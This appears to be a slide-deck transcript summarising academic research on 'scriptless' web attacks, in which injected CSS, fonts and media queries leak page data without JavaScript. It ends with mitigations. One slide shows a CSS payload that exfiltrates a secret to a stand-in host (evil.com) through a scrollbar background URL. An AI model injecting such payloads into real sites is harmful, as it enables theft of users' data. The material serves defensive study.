70 likes | 193 Views
Script less Attacks. Stealing the Pie Without Touching the Sill. Background. XSS recently replaced SQL injection and related server-side injection attacks as the number one threat in the OWASP (Open Web Application Security Project) ranking.
E N D
Script less Attacks Stealing the Pie Without Touching the Sill
Background • XSS recently replaced SQL injection and related server-side injection attacks as the number one threat in the OWASP (Open Web Application Security Project) ranking. • As popular applications like Skype, Outlook, Thunderbird, Windows 8 are using HTML, security extensions like NoScript are being used by users. • Given all these defense strategies, we expect that attackers will thrive towards developing “Scriptless Attacks” which achieve same goal as XSS attacks without using any scripting.
Assumptions: • The attacker can inject arbitrary data into the DOM rendered by the browser • We assume that scripting is completely disabled • The following browser features to be useful building blocks in constructing attacks - Web-fonts based on SVG and WOFF • Attacker employ these fonts and utilize their features to vary the properties of displayed website content. BEYOND SCRIPT-BASED ATTACKS
CSS-based Animations • With CSS based animations, it is possible to over time change a wide range of CSS and DOM properties without using any script code • The CSS Content Property • CSS allows to use a property called content to extract arbitrary attribute values and display the value either before, after, or instead of the selected element • CSS Media Queries Attack Components a[href^=http://]:after{content:attr(href)} <style type="text/css"> @media screen and (min -width: 401px){ *{ background:green;} body:after{content:’larger view -port’} } @media screen and (max -width: 400px) { *{ background:red;} body:after{content:’smaller view -port’ } } </style >
To enable a purely CSS-based data exfiltration attack, we utilize all of the available features listed in above section. <div id="s">secret </div > <style type="text/css"> div#s::-webkit -scrollbar -track -piece :vertical:increment { background:redurl(// evil.com?s); } </style > • To mitigate this attack, • it is recommended to treat scrollbar backgrounds and scrollbar state backgrounds equally; • all background images and similar external resources should be loaded during page-load and not on appearance or state occurrence. Measurement-based Content Exfiltration-using Smart Scrollbars
MITIGATION TECHNIQUES • We conclude that several layers of protection are necessary to effectively and holistically defend against CSS-, SVG- and HTML-based data leakage • Content Security Policy (CSP) • Detecting Detached Views • Miscellaneous Defense Techniques Conclusion : While the attacks discussed in this paper presumably do not represent the entirety of ways to illegitimately retrieve sensitive user-data, we believe that the attack components discussed in this paper are of great importance to other attack vectors.